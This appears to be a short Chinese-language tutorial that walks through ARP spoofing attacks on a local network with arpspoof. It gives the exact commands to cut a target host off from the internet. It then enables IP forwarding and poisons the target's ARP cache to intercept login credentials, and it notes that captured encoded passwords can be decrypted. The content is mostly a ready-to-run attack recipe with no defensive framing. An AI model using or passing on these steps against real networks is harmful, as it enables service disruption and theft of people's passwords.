操作方法
断网攻击: 首先我们需要知道攻击的目标ip及网关和我们攻击者的ip及网卡 本例中,目标IP:192.168.147.130 目标网关:192.168.147.2 本机IP:192.168.147.132 本机网卡:eth0
攻击前,先查看目标主机是否能联通互联网。经查看:可以 打开中断,输入以下命令进行断网攻击 arpspoof -i 本机网卡 -t 目标ip 目标网关 本例中命令为:arpspoof -i eth0 -t 192.168.147.130 192.168.147.2
攻击成功!
欺骗攻击(密码劫持) 同样我们也需要知道目标IP、目标网关、本机网卡、本机IP。 此例依旧使用上述目标及本机
打开终端输入命令: echo 1 > /proc/sys/net/ipv4/ip_forward 使目标IP不断网 cat /proc/sys/net/ipv4/ip_forward 检查上述命令是否被执行,若返回1则说明命令已被执行 arpspoof -i 本机网卡 -t 目标IP 目标网关 在本例中,命令应为: arpspoof -i eth0 -t 192.168.147.130 192.168.147.2
另起终端,用来接收劫持(盗取的信息)
随意登陆一个网站,可发现用户名及密码已被劫持。 可以看到用户名为123,而密码为一串编码,这是因为网站对密码加密的缘故,可通过解密手段对编码进行解码